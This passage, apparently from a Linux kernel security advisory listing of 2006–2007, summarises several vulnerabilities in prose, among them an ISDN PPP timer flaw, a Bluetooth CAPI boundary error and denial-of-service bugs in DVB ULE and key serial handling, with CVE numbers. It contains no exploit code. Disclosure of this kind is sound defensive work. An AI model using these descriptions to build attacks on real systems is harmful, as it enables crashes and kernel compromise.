drivers/isdn/i4l/isdn_ppp.c as the "isdn_ppp_ccp_reset_alloc_state()"
function never initializes an event timer before scheduling it with the
"add_timer()" function.
The mincore function in the kernel does not properly lock access to user
space, which has unspecified impact and attack vectors, possibly related to
a deadlock.
Another vulnerability has been reported in Linux kernel caused by a
boundary error within the handling of incoming CAPI messages in
net/bluetooth/cmtp/capi.c. This can be exploited to overwrite certain
Kernel data structures. |
| Alerts: |
|
Comments (none posted)
kernel: denial of service
| Package(s): | kernel |
CVE #(s): | CVE-2006-4623
|
| Created: | October 18, 2006 |
Updated: | November 14, 2007 |
| Description: |
The kernel DVB layer can be caused to crash with maliciously-formatted unidirectional lightweight encapsulation (ULE) data. |
| Alerts: |
|
Comments (none posted)
kernel: denial of service
| Package(s): | kernel |
CVE #(s): | CVE-2006-0007
CVE-2007-0006
|
| Created: | February 15, 2007 |
Updated: | November 14, 2007 |
| Description: |
Linux kernel versions from 2.6.9 to 2.6.20 have a denial of service
vulnerability. A remote attacker can cause the key_alloc_serial
function's key serial number collision avoidance code to have a
null dereference, resulting in a crash. |
| Alerts: |
|
Comments (1 posted)
kernel: denial of service